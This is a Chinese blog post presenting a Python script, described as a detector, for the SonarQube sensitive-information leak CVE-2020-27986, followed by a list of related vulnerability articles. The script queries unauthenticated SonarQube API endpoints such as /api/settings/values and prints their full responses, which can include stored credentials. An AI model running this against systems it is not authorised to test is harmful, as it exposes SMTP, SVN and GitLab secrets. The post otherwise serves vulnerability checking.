CVE-2020-27986(SonarQube敏感信息泄露)检测脚本

最新推荐文章于 2024-01-03 09:25:56 发布
最新推荐文章于 2024-01-03 09:25:56 发布
阅读量2.5k 收藏 2
点赞数 2
文章标签: 安全漏洞 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dreamthe/article/details/121664856
版权

下一遍:CVE-2021-41773、CVE-2021-42013检测脚本_dreamthe的博客-CSDN博客

我自己写的一个简单检测CVE-2020-27986漏洞的脚本。仅供参考

import argparse
import json
import sys
import requests



def options():
    parser = argparse.ArgumentParser()
    parser.add_argument('-m', '--module', default='', dest='action_name', required=True,
                        help='模块的英文名称, 必填参数')
    parser.add_argument('-d', '--dict', dest='json_data', required=True,
                        help='目标url')
    parser.add_argument('-v', '--version', action='version', version='%(prog)s 1.0')
    params = parser.parse_args()
    execute(params.action_name, json_data=params.json_data)


def usage():
    print('''
                へ     /|
              /\7    ∠_/
              / │   / /
             │ Z _,< /   /`ヽ
             │     ヽ   /  〉
              Y     `  /  /
             イ● 、 ●  ⊂⊃〈  /
             ()  へ    | \〈
              >ー 、_  ィ  │ //
              / へ   / ノ<| \\
              ヽ_ノ  (_/  │//
              7       |/
              >―r ̄ ̄`ー―_
      ''')
    print('\n')


def execute(action_name, json_data):

    if action_name == 'CVE-2020-27986':
        result = CVE_2020_27986(json_data)
    else:
        result = []
    print(result)
    return result


def CVE_2020_27986(url):
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate',
        'Upgrade-Insecure-Requests': '1'
    }
    payload = ['/api/settings/values', '/api/webservices/list']
    for poc in payload:
        target_url = url + poc
        try:
            res = requests.get(url=target_url, headers=headers, verify=False, timeout=5)
            result = {'url': target_url, 'code': res.status_code,'data': res.text}
            return result
        except Exception as e:
            print(e)


if __name__ == '__main__':
    usage()
    options()

使用方法:

打开cmd 输入命令 python3环境

python pocscheckr.py -m CVE-2020-27986 -d http://www.example.com

糊涂是福yyyy
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SonarQube检测出的bug、漏洞以及异味的修复整理,如何用分库分表的9种分布式主键ID生成方案
m0_60606468的博客
03-23 1214
学完之后,若是想验收效果如何,其实最好的方法就是可自己去总结一下。比如我就会在学习完一个东西之后自己去手绘一份xmind文件的知识梳理大纲脑图,这样也可方便后续的复习,且都是自己的理解,相信随便瞟几眼就能迅速过完整个知识,脑补回来。下方即为我手绘的MyBtis知识脑图,由于是xmind文件,不好上传,所以小编将其以图片形式导出来传在此处,细节方面不是特别清晰。但可给感兴趣的朋友提供完整的MyBtis知识脑图原件(包括上方的面试解析xmind文档)
github-cve-monitor:监控github上添加的cve编号项目裂缝,推钉钉或者服务器酱
03-04
github-cve-monitor 监控github上添加的cve编号项目扩展,插入钉钉或者服务器酱 python3 -m pip安装dingtalkchatbot 每3分钟检测一次github是否有新的cve扩展提交记录,若有则通过服务器酱和钉钉机器人推动(同时配置一个即可) 时间间隔修改在58行 建议使用运行在自己的linux vps后台上,就可以愉快的接收各种cve了 screen -S github_cve #创建一个screen,名字为github_cve,在新窗口运行本项目, 成功后直接叉掉该窗口, 项目就会在后台一直运行了 screen -ls #查看创建的screen screen -r github_cve #连接github_cve后台screen,如果存在的话 钉钉机器人配置在33行的dingding函数中,需要钉钉建群,添加钉钉机器人,复制webhook
CVE-2020-27986(Sonarqube敏感信息泄漏) 漏洞修复
耕耘
08-02 3422
注意据报道,供应商对SMTP和SVN的立场是“配置它是管理员的责任”。该漏洞为2020年10月披露,近期发现较多境外媒体爆料多起源代码泄露事件,涉及我国多个机构和企业的SonarQube。看上面的描述,如果关闭的话,会允许匿名用户访问sonarqubeUI或者通过webapi获取项目数据。针对sonarqube的漏洞CVE-2020-27986修复方案。修复方案1如果sonarqube版本低于8.6,请升级版本。实际我们的环境的sonarqube为9.3,也被扫描出漏洞。...
CVE-2020-27986(SonarQube敏感信息泄露)漏洞复现
dreamthe的博客
11-29 6341
目录 1.事情背景 2.了解SonarQube 3.漏洞简述 4.搭建靶场 5.漏洞复现 1.事情背景 近期发现较多境外媒体爆料多起源代码泄露事件,涉及我国多个机构和企业的SonarQube代码审计平台,该事件时间轴为:网传 SonarQube 平台漏洞被利用,大量源码泄露 - OSCHINA - 中文开源技术交流社区可以自己去看看 2.了解SonarQube SonarQube 是一个开源代码质量管理和分析审计平台,支持包括 Java、C#、C/C++、PL/SQL、Cobol、Java
ScanCVE:监控github上CVE增量,并发送微信通知
03-12
ScanCVE 0.1 这个脚本主要定时扫描github,监控cve的增量情况,如存在增量poc情况,逐步通过微信公众号进行转换。 作者 咚咚呛 如有其他建议,可联系微信280495355 技术细节 技术细节如下 1、定时通过github的api搜索关键字 2、增量监控cve特征 3、提取cve编号,进行mitre查询,并翻译为汉语说明 4、动态配置需要推送的微信公众号CORPID、CORPSECRET等 程序使用 root# git clone root# cd ScanCVE root# sudo pip install -r requirements.txt root# vim conf / info.conf #配置微信公众号信息 root# nohup python ScanCVE.py和 运行截图
帮我用python写一个oracle连接并输出敏感信息脚本敏感信息用字典写入
weixin_35756373的博客
01-08 75
在此之前,您需要先安装 Oracle 数据库的 Python 连接器 cx_Oracle,然后可以使用下面的代码连接到 Oracle 数据库并输出敏感信息: import cx_Oracle # 连接字符串 dsn = cx_Oracle.makedsn('hostname', 'port', 'sid') # 连接数据库 connection = cx_Oracle.connect('use...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
cve-2020-2551_poc.py
03-12
cve-2020-2551_poc.py
Python-近实时监控Github敏感信息泄露并发送告警通知
08-10
Github Sensitive Information Leakage(Github敏感信息泄露
GithubMonitor-GitHub敏感信息监控脚本
09-14
GitHub敏感信息监控脚本,通过检索GitHub的搜索结果关键字来发现敏感信息,降低程序员GitHub项目上泄露敏感信息的可能性。
CVE-2017-12615利用脚本
04-16
CVE-2017-12615利用脚本;tomcat服务器PUT上传导致命令执行。
CVE-2020-7143漏洞复现
一个安全研究员
12-27 2194
复现一波
XStream 反序列化漏洞 (CVE-2020-26258 & 26259) 的复现与分析
smellycat000的专栏
12-16 3659
聚焦源代码安全,网罗国内外最新资讯!Xstream 是 Java 类库,用来将对象序列化成 XML (JSON) 或反序列化为对象。XStream 是一款开源软件,允许在 BSD 许可...
Apache Tomcat AJP 文件包含漏洞复现(CVE-2020-10487)
OKAY_TC的博客
02-22 974
影响范围: tomcat 7:<7.0.100 tomcat 8: <7.5.51 tomcat 9: <9.0.31 利用条件: 1、漏洞版本范围内。 2、默认开启ajp服务。 漏洞复现: nmap扫描: //默认端口8009,经测试存在更改默认端口为80,7009,9009情况。 脚本利用: // -p指定端口 -f 目标文件路径 ...
SonarQube敏感信息泄露(CVE-2020-27986)
最新发布
m0_65150886的博客
01-03 614
该漏洞是由于配置不当造成的未授权访问,攻击者可以利用该漏洞在未授权的情况下访问 api/settings/values 接口从而获取到 SMTP、SVN、GitLab 凭据,进一步获取其它敏感代码和数据信息,造成严重危害。可以看到很多未授权的api信息。1.访问ip:port。
CVE-2020-15778 openssh漏洞修复
N07ME的博客
12-11 6794
漏洞描述 https://access.redhat.com/security/cve/cve-2020-15778 简单来说,就是scp命令是可以注入特殊字段,在目标主机上执行指令的。 原理是因为scp是通过ssh实现的,一样的需要用户名和密码才能登陆。也就是说,这个漏洞其实针对的是那些禁用了ssh但是没禁用scp的主机,针对这些主机,可以从外部通过scp实现和ssh一样的功能。 漏洞修复方案 1.升级到openssh-8.4以上的版本 (要求操作系统版本在centos 8及以上) 2.禁用scp命令 m
CVE-2020-27986
08-26
CVE-2020-27986是指SonarQube敏感信息泄露漏洞。根据引用的描述,它是一个Python脚本,用于检测CVE-2020-27986漏洞。具体内容可以在CSDN上查看。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [CVE-2020-27986(SonarQube敏感信息泄露)漏洞复现](https://blog.csdn.net/dreamthe/article/details/121617470)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE](https://download.csdn.net/download/weixin_42181545/19185756)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值